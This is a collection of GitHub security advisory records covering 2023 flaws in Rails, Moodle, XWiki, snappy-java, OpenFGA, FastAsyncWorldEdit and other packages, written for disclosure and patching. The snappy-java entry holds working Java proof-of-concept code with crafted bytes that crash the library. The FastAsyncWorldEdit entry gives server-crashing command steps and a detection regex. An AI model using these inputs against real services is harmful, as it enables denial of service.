1.4.0 | GHSA-4g8v-vg43-wpgf | 2023-06-29T15:03:16Z | 2023-06-29T15:03:16Z | null | ['CVE-2023-28362'] | Actionpack has possible cross-site scripting vulnerability via User Supplied Values to redirect_to | The `redirect_to` method in Rails allows provided values to contain characters which are not legal in an HTTP header value. This results in the potential for downstream services which enforce RFC compliance on HTTP response headers to remove the assigned Location header. This vulnerability has been assigned the CVE identifier CVE-2023-28362.
Versions Affected: All. Not affected: None Fixed Versions: 7.0.5.1, 6.1.7.4
# Impact
This introduces the potential for a Cross-site-scripting (XSS) payload to be delivered on the now static redirection page. Note that this both requires user interaction and for a Rails app to be configured to allow redirects to external hosts (defaults to false in Rails >= 7.0.x).
# Releases
The FIXED releases are available at the normal locations.
# Workarounds
Avoid providing user supplied URLs with arbitrary schemes to the `redirect_to` method.
| [] | [{'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.7.4'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.5.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/1c3f93d1e90a3475f9ae2377ead25ccf11f71441'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/commit/c9ab9b32bcdcfd8bcd55907f6c7b20b4e004cc23'}, {'type': 'WEB', 'url': 'https://discuss.rubyonrails.org/t/cve-2023-28362-possible-xss-via-user-supplied-values-to-redirect-to/83132'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/rails'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2023-28362.yml'}] | {'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-29T15:03:16Z', 'nvd_published_at': None} |
1.4.0 | GHSA-rx62-5cw6-x29q | 2023-06-19T22:46:24Z | 2023-06-18T09:30:17Z | null | ['CVE-2023-3308'] | Whaleal IceFrog is vulnerable to deserialization | Whaleal IceFrog v1.1.8 component Aviator Template Engine is vulnerable to deserialization of untrusted data. The application deserializes untrusted data without sufficiently verifying that the resulting data will be valid. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}] | [{'package': {'ecosystem': 'Maven', 'name': 'com.whaleal.icefrog:icefrog-all'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.8'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3308'}, {'type': 'WEB', 'url': 'https://github.com/NanKeXXX/selfVuln_poc/blob/main/whaleal%3Aicefrog/icefrog_1.1.8_RCE.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/whaleal/icefrog'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.231804'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.231804'}] | {'cwe_ids': ['CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-19T22:46:24Z', 'nvd_published_at': None} |
1.4.0 | GHSA-hr9r-8phq-5x8j | 2023-07-03T18:39:26Z | 2023-06-28T22:49:49Z | null | ['CVE-2023-35933'] | OpenFGA vulnerable to denial of service due to circular relationship | ### Overview
OpenFGA versions v1.1.0 and prior are vulnerable to a DoS attack when certain Check and ListObjects calls are executed against authorization models that contain circular relationship definitions.
### Am I Affected?
You are affected by this vulnerability if you are using OpenFGA v1.1.0 or earlier, and if you are executing certain [Check](https://openfga.dev/api/service#/Relationship%20Queries/Check) or [ListObjects](https://openfga.dev/api/service#/Relationship%20Queries/ListObjects) calls against a vulnerable authorization model. To see which of your models could be vulnerable to this attack, download OpenFGA v1.2.0 and run the following command:
```
./openfga validate-models --datastore-engine <ENGINE> --datastore-uri <URI> | jq .[] | select(.Error | contains("loop"))
```
replacing the variables `<ENGINE>` and `<URI>` as needed.
### Fix
Upgrade to v1.1.1.
### Backward Compatibility
If you are not passing an invalid authorization model (as identified by running `./openfga validate-models`) as a parameter of your Check and ListObjects calls, this upgrade is backwards compatible.
Otherwise, OpenFGA v1.1.1 will start returning HTTP 400 status codes on those calls. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'Go', 'name': 'github.com/openfga/openfga'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/openfga/openfga/security/advisories/GHSA-hr9r-8phq-5x8j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35933'}, {'type': 'WEB', 'url': 'https://github.com/openfga/openfga/commit/087ce392595f3c319ab3028b5089118ea4063452'}, {'type': 'PACKAGE', 'url': 'https://github.com/openfga/openfga'}, {'type': 'WEB', 'url': 'https://openfga.dev/api/service#/Relationship%20Queries/Check'}, {'type': 'WEB', 'url': 'https://openfga.dev/api/service#/Relationship%20Queries/ListObjects'}] | {'cwe_ids': ['CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-28T22:49:49Z', 'nvd_published_at': None} |
1.4.0 | GHSA-whj9-m24x-qhhp | 2023-06-22T20:00:36Z | 2023-06-22T20:00:36Z | null | ['CVE-2023-35925'] | FastAsyncWorldEdit vulnerable to Uncontrolled Resource Consumption | ### Coordinated Disclosure Timeline
- 10.06.2023: Issue reported to IntellectualSites
- 11.06.2023: Issue is acknowledged
- 12.06.2023: Issue has been fixed
- 22.06.2023: Advisory has been published
### Impacted version range
Before 2.6.3
### Details
#### Proof of Concept
As a user, do the following:
1. Select position 1 via `//pos1`
2. Select position 2 adding the "Infinity" keyword via `//pos2 Infinity`
3. Execute any further operation.
The steps 1 and 2 are interchangeable.
#### Impact
Such a task has a possibility of bringing the performing server down.
#### CVE
- CVE-2023-35925
#### Credit
This issue was discovered and [reported](https://github.com/IntellectualSites/.github/blob/main/SECURITY.md) by @SuperMonis.
### Solution
On June 12, 2023, a patch, https://github.com/IntellectualSites/FastAsyncWorldEdit/pull/2285, has been merged addressing the vulnerability.
We strongly recommend users to update their version of FastAsyncWorldEdit to 2.6.3 as soon as possible.
### Workarounds
There is no direct mitigation besides updating FastAsyncWorldEdit to a patched version.
### Additional Information
Users with access to the `logs/` folder or shell access on their server can try to identify possible abuses of this issue by going through the logs.
To sieve through the data, you can use the regex query `\/\/pos[12] Infinity`, then investigate all log entries that return results.
### Disclosure Policy
If you discover a security vulnerability within our software, please report the issue according to our [vulnerability disclosure policy](https://github.com/IntellectualSites/.github/blob/main/SECURITY.md). | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'com.fastasyncworldedit:FastAsyncWorldEdit-Core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.fastasyncworldedit:FastAsyncWorldEdit-Bukkit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.3'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/IntellectualSites/FastAsyncWorldEdit/security/advisories/GHSA-whj9-m24x-qhhp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35925'}, {'type': 'WEB', 'url': 'https://github.com/IntellectualSites/FastAsyncWorldEdit/pull/2285'}, {'type': 'PACKAGE', 'url': 'https://github.com/IntellectualSites/FastAsyncWorldEdit'}, {'type': 'WEB', 'url': 'https://github.com/IntellectualSites/FastAsyncWorldEdit/releases/tag/2.6.3'}] | {'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:00:36Z', 'nvd_published_at': None} |
1.4.0 | GHSA-4gxf-g5gf-22h4 | 2023-06-12T18:34:39Z | 2023-06-10T06:30:25Z | null | ['CVE-2023-26132'] | dottie vulnerable to Prototype Pollution | Versions of the package dottie before 2.0.4 are vulnerable to Prototype Pollution due to insufficient checks, via the `set()` function and the current variable in the `/dottie.js` file. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'npm', 'name': 'dottie'}, 'ecosystem_specific': {'affected_functions': ['dottie.set']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.4'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26132'}, {'type': 'WEB', 'url': 'https://github.com/mickhansen/dottie.js/commit/7d3aee1c9c3c842720506e131de7e181e5c8db68'}, {'type': 'PACKAGE', 'url': 'https://github.com/mickhansen/dottie.js'}, {'type': 'WEB', 'url': 'https://github.com/mickhansen/dottie.js/blob/b48e22714aae4489ea6276452f22cc61980ba5a4/dottie.js#L107'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-DOTTIE-3332763'}] | {'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T18:34:39Z', 'nvd_published_at': None} |
1.4.0 | GHSA-9849-p7jc-9rmv | 2023-06-22T19:58:54Z | 2023-06-22T19:58:54Z | null | ['CVE-2022-24839'] | org.nokogiri:nekohtml vulnerable to Uncontrolled Resource Consumption | ## Summary
The fork of `org.cyberneko.html` used by Nokogiri (Rubygem) raises a `java.lang.OutOfMemoryError` exception when parsing ill-formed HTML markup.
## Severity
The maintainers have evaluated this as [**High Severity** 7.5 (CVSS3.1)](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
## Mitigation
Upgrade to `>= 1.9.22.noko2`.
## Credit
This vulnerability was reported by [이형관 (windshock)](https://www.linkedin.com/in/windshock/).
## References
[CWE-400](https://cwe.mitre.org/data/definitions/400.html) Uncontrolled Resource Consumption
## Notes
The upstream library `org.cyberneko.html` is no longer maintained. Nokogiri uses its own fork of this library located at https://github.com/sparklemotion/nekohtml and this CVE applies only to that fork. Other forks of nekohtml may have a similar vulnerability.
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.nokogiri:nekohtml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.22.noko2'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/sparklemotion/nekohtml/security/advisories/GHSA-9849-p7jc-9rmv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-24839'}, {'type': 'WEB', 'url': 'https://github.com/sparklemotion/nekohtml/commit/a800fce3b079def130ed42a408ff1d09f89e773d'}, {'type': 'PACKAGE', 'url': 'https://github.com/sparklemotion/nekohtml'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}] | {'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T19:58:54Z', 'nvd_published_at': None} |
1.4.0 | GHSA-qcm3-vfq5-wfr2 | 2023-06-12T20:09:30Z | 2023-06-06T18:30:20Z | null | ['CVE-2023-31606'] | RedCloth Regular Expression Denial of Service issue | A Regular Expression Denial of Service (ReDoS) issue was discovered in the `sanitize_html` function of RedCloth gem v4.0.0. This vulnerability allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'RubyGems', 'name': 'RedCloth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.3.2'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31606'}, {'type': 'WEB', 'url': 'https://github.com/jgarber/redcloth/issues/73'}, {'type': 'WEB', 'url': 'https://github.com/e23e/CVE-2023-31606#readme'}, {'type': 'PACKAGE', 'url': 'https://github.com/jgarber/redcloth'}, {'type': 'WEB', 'url': 'https://github.com/jgarber/redcloth/blob/v4.3.2/lib/redcloth/formatters/html.rb#L327'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/RedCloth/CVE-2023-31606.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/07/msg00002.html'}] | {'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T20:27:29Z', 'nvd_published_at': None} |
1.4.0 | GHSA-fwfj-8p36-rc64 | 2023-06-30T20:21:14Z | 2023-06-22T21:30:49Z | null | ['CVE-2023-35131'] | Moodle vulnerable to Cross-site Scripting | Content on the groups page required additional sanitizing to prevent an XSS risk. This flaw affects Moodle versions 4.2, 4.1 to 4.1.3, 4.0 to 4.0.8 and 3.11 to 3.11.14. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.1'}]}], 'versions': ['4.2.0']}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.9'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.11.15'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35131'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7A72KX4WU6GK2CX4TKYFGFASPKOEOJFC/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I5QAEAGJ44NVXLAJFJXKARKC45OGEDXT/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=447829'}, {'type': 'WEB', 'url': 'http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-76683'}] | {'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:38:20Z', 'nvd_published_at': None} |
1.4.0 | GHSA-w2rr-wvh9-m2m7 | 2023-06-27T21:01:16Z | 2023-06-14T15:30:38Z | null | ['CVE-2023-34615'] | JSONUtil vulnerable to stack exhaustion | An issue was discovered JSONUtil through 5.0 that allows attackers to cause a denial of service or other unspecified impacts via crafted objects that deeply nested structures. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'net.pwall.json:jsonutil'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34615'}, {'type': 'WEB', 'url': 'https://github.com/billdavidson/JSONUtil/issues/10'}] | {'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T21:20:51Z', 'nvd_published_at': None} |
1.4.0 | GHSA-x3m2-3pwj-8fj4 | 2023-06-28T16:29:10Z | 2023-06-23T15:30:43Z | null | ['CVE-2023-3304'] | Admidio Improper Access Control vulnerability | Admidio prior to 4.2.9 is vulnerable to Improper Access Control. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'admidio/admidio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.9'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3304'}, {'type': 'WEB', 'url': 'https://github.com/admidio/admidio/commit/3b248b7d5e0e60a00ee2f9a6908d538d62a5837f'}, {'type': 'PACKAGE', 'url': 'https://github.com/admidio/admidio'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/721fae61-3c8c-4e4b-8407-64321bc0ed17'}] | {'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T17:01:07Z', 'nvd_published_at': None} |
1.4.0 | GHSA-q97c-2mh3-pgw9 | 2023-06-28T22:33:26Z | 2023-06-28T22:33:26Z | null | ['CVE-2023-34098'] | Shopware dependency configuration exposed | ### Impact
Due to a wrong configuration in the `.htaccess` file, the configuration file of Javascript dependencies could be read in production environments (`themes/package-lock.json`). With this information, the used Shopware version might be determined by an attacker, which could be used for further attacks.
### Patches
We recommend updating to the current version 5.7.18. You can get the update to 5.7.18 regularly via the Auto-Updater or directly via the release page.
https://github.com/shopware5/shopware/releases/tag/v5.7.18
For older versions you can use the Security Plugin:
https://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html
### References
https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-06-2023
| [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}] | [{'package': {'ecosystem': 'Packagist', 'name': 'shopware/shopware'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.6.0'}, {'fixed': '5.7.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.7.17'}}] | [{'type': 'WEB', 'url': 'https://github.com/shopware/shopware/security/advisories/GHSA-q97c-2mh3-pgw9'}, {'type': 'WEB', 'url': 'https://github.com/shopware5/shopware/security/advisories/GHSA-q97c-2mh3-pgw9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34098'}, {'type': 'WEB', 'url': 'https://github.com/shopware5/shopware/commit/b3518c8d9562a38615d638f31f79829f6e2f4b6a'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-06-2023'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware5/shopware'}, {'type': 'WEB', 'url': 'https://www.shopware.com/en/changelog-sw5/#5-7-18'}] | {'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-28T22:33:26Z', 'nvd_published_at': None} |
1.4.0 | GHSA-793w-g325-hrw2 | 2023-06-30T20:40:47Z | 2023-06-30T20:40:47Z | null | ['CVE-2023-36477'] | XWiki Platform vulnerable to persistent Cross-site Scripting through CKEditor Configuration pages | ### Effect
Any user with edit rights can edit all pages in the `CKEditor' space. This makes it possible to perform a variety of harmful actions, such as
- removing technical documents, leading to loss of service
- Editing the javascript configuration of CKEditor, leading to persistent XSS
### Patches
This issue has been patched in XWiki 14.10.6 and XWiki 15.1.
This issue has been patched on the CKEditor Integration extension 1.64.9 for XWiki version older than 14.6RC1.
### Workarounds
The issue can be fixed manually by restricting the `edit` and `delete` rights to a trusted user or group (e.g. the `XWiki.XWikiAdminGroup` group), implicitly disabling those rights for all other users.
See https://github.com/xwiki/xwiki-platform/commit/9d9d86179457cb8dc48b4491510537878800be4f
### References
- https://jira.xwiki.org/browse/XWIKI-20590
- https://jira.xwiki.org/browse/CKEDITOR-508
- https://github.com/xwiki/xwiki-platform/commit/9d9d86179457cb8dc48b4491510537878800be4f
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org) | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-ckeditor-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.6-rc-1'}, {'fixed': '14.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.contrib:application-ckeditor-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9'}, {'fixed': '1.64.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-ckeditor-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.1'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-793w-g325-hrw2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36477'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/9d9d86179457cb8dc48b4491510537878800be4f'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/CKEDITOR-508'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20590'}] | {'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:40:47Z', 'nvd_published_at': None} |
1.4.0 | GHSA-qcwq-55hx-v3vh | 2023-08-18T15:45:35Z | 2023-06-15T17:15:06Z | null | ['CVE-2023-34455'] | snappy-java's unchecked chunk length leads to DoS | ## Summary
Due to use of an unchecked chunk length, an unrecoverable fatal error can occur.
## Impact
Denial of Service
## Description
The code in the function [hasNextChunk](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/SnappyInputStream.java#L388) in the file [SnappyInputStream.java](https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/SnappyInputStream.java) checks if a given stream has more chunks to read. It does that by attempting to read 4 bytes. If it wasn’t possible to read the 4 bytes, the function returns false. Otherwise, if 4 bytes were available, the code treats them as the length of the next chunk.
```java
int readBytes = readNext(header, 0, 4);
if (readBytes < 4) {
return false;
}
int chunkSize = SnappyOutputStream.readInt(header, 0);
if (chunkSize == SnappyCodec.MAGIC_HEADER_HEAD) {
.........
}
// extend the compressed data buffer size
if (compressed == null || chunkSize > compressed.length) {
compressed = new byte[chunkSize];
}
```
In the case that the “compressed” variable is null, a byte array is allocated with the size given by the input data. Since the code doesn’t test the legality of the “chunkSize” variable, it is possible to pass a negative number (such as 0xFFFFFFFF which is -1), which will cause the code to raise a “java.lang.NegativeArraySizeException” exception. A worse case would happen when passing a huge positive value (such as 0x7FFFFFFF), which would raise the fatal “java.lang.OutOfMemoryError” error.
## Steps To Reproduce
Compile and run the following code:
```java
package org.example;
import org.xerial.snappy.SnappyInputStream;
import java.io.*;
public class Main {
public static void main(String[] args) throws IOException {
byte[] data = {-126, 'S', 'N', 'A', 'P', 'P', 'Y', 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0x7f, (byte) 0xff, (byte) 0xff, (byte) 0xff};
SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data));
byte[] out = new byte[50];
try {
in.read(out);
}
catch (Exception ignored) {
}
}
}
```
The program will crash with the following error (or similar), even though there is a catch clause, since “OutOfMemoryError” does not get caught by catching the “Exception” class:
```
Exception in thread "main" java.lang.OutOfMemoryError: Requested array size exceeds VM limit
at org.xerial.snappy.SnappyInputStream.hasNextChunk(SnappyInputStream.java:422)
at org.xerial.snappy.SnappyInputStream.read(SnappyInputStream.java:167)
at java.base/java.io.InputStream.read(InputStream.java:217)
at org.example.Main.main(Main.java:12)
```
Alternatively - compile and run the following code:
```java
package org.example;
import org.xerial.snappy.SnappyInputStream;
import java.io.*;
public class Main {
public static void main(String[] args) throws IOException {
byte[] data = {-126, 'S', 'N', 'A', 'P', 'P', 'Y', 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff};
SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data));
byte[] out = new byte[50];
in.read(out);
}
}
```
The program will crash with the following error (or similar):
```
Exception in thread "main" java.lang.NegativeArraySizeException: -1
at org.xerial.snappy.SnappyInputStream.hasNextChunk(SnappyInputStream.java:422)
at org.xerial.snappy.SnappyInputStream.read(SnappyInputStream.java:167)
at java.base/java.io.InputStream.read(InputStream.java:217)
at org.example.Main.main(Main.java:12)
```
It is important to note that these examples were written by using a flow that is generally used by developers, and can be seen for example in the Apache project “flume”: https://github.com/apache/flume/blob/f9dbb2de255d59e35e3668a5c6c66a268a055207/flume-ng-channels/flume-file-channel/src/main/java/org/apache/flume/channel/file/Serialization.java#L278. Since they used try-catch, the “NegativeArraySizeException” exception won’t harm their users, but the “OutOfMemoryError” error can. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'org.xerial.snappy:snappy-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.10.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.10.0'}}] | [{'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/security/advisories/GHSA-qcwq-55hx-v3vh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34455'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/commit/3bf67857fcf70d9eea56eed4af7c925671e8eaea'}, {'type': 'PACKAGE', 'url': 'https://github.com/xerial/snappy-java'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/SnappyInputStream.java#L388'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/SnappyInputStream.java'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230818-0009/'}] | {'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-15T17:15:06Z', 'nvd_published_at': None} |
1.4.0 | GHSA-2jx2-qcm4-rf9h | 2023-06-09T19:32:18Z | 2023-06-09T19:32:18Z | null | ['CVE-2021-36153'] | Incomplete Internal State Distinction in GRPCWebToHTTP2ServerCodec | ### Impact
Affected gRPC Swift servers are vulnerable to precondition failures when parsing certain gRPC Web requests. This may lead to a denial of service.
### Patches
The problem has been fixed in 1.2.0.
### Workarounds
No workaround is available. Users must upgrade. | [] | [{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/grpc/grpc-swift'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}] | [{'type': 'WEB', 'url': 'https://github.com/grpc/grpc-swift/security/advisories/GHSA-2jx2-qcm4-rf9h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36153'}, {'type': 'WEB', 'url': 'https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=35267'}, {'type': 'PACKAGE', 'url': 'https://github.com/grpc/grpc-swift'}, {'type': 'WEB', 'url': 'https://github.com/grpc/grpc-swift/releases'}] | {'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T19:32:18Z', 'nvd_published_at': '2021-07-09T12:15:00Z'} |
1.4.0 | GHSA-779h-3r69-4f5p | 2023-06-27T19:48:33Z | 2023-06-14T15:30:38Z | null | ['CVE-2023-34610'] | json-io vulnerable to stack exhaustion | An issue was discovered json-io through 4.14.0 allows attackers to cause a denial of service or other unspecified impacts via crafted object that have deeply nested structures. | [{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}] | [{'package': {'ecosystem': 'Maven', 'name': 'com.cedarsoftware:json-io'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.14.0'}]}]}] | [{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34610'}, {'type': 'WEB', 'url': 'https://github.com/jdereg/json-io/issues/169'}, {'type': 'PACKAGE', 'url': 'https://github.com/jdereg/json-io'}] | {'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T21:04:22Z', 'nvd_published_at': None} |
